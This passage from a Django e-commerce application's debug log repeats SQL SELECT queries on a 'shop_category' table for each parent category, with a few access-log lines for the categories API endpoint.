07:37:17,911 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:37:17,915 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:37:17,919 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:37:17,926 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:37:17,930 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:37:17,935 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:37:17,939 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:37:17,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:37:17,951 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:37:17,955 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:37:17,959 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:37:17,964 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:37:17,968 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:37:17,973 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:37:17,978 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:37:17,982 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:37:17,986 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:37:17,991 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:37:17,996 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:37:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:38:18,739 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:38:18,750 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:38:18,757 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:38:18,761 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:38:18,766 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:38:18,770 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:38:18,775 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:38:18,779 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:38:18,783 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:38:18,789 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:38:18,792 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:38:18,797 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:38:18,801 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:38:18,805 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:38:18,811 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:38:18,815 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:38:18,818 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:38:18,823 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:38:18,827 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:38:18,833 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:38:18,837 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 07:38:18,841 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:38:18,845 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:38:18,849 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:38:18,852 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:38:18,858 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:38:18,862 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:38:18,866 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:38:18,870 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:38:18,874 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:38:18,880 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:38:18,884 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:38:18,888 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:38:18,891 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:38:18,895 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:38:18,902 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:38:18,906 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:38:18,910 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:38:18,913 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:38:18,917 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:38:18,921 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:38:18,926 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:38:18,930 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:38:18,934 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:38:18,939 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:38:18,943 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:38:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 07:40:21] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 07:40:36,283 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:40:36,294 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:40:36,300 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", 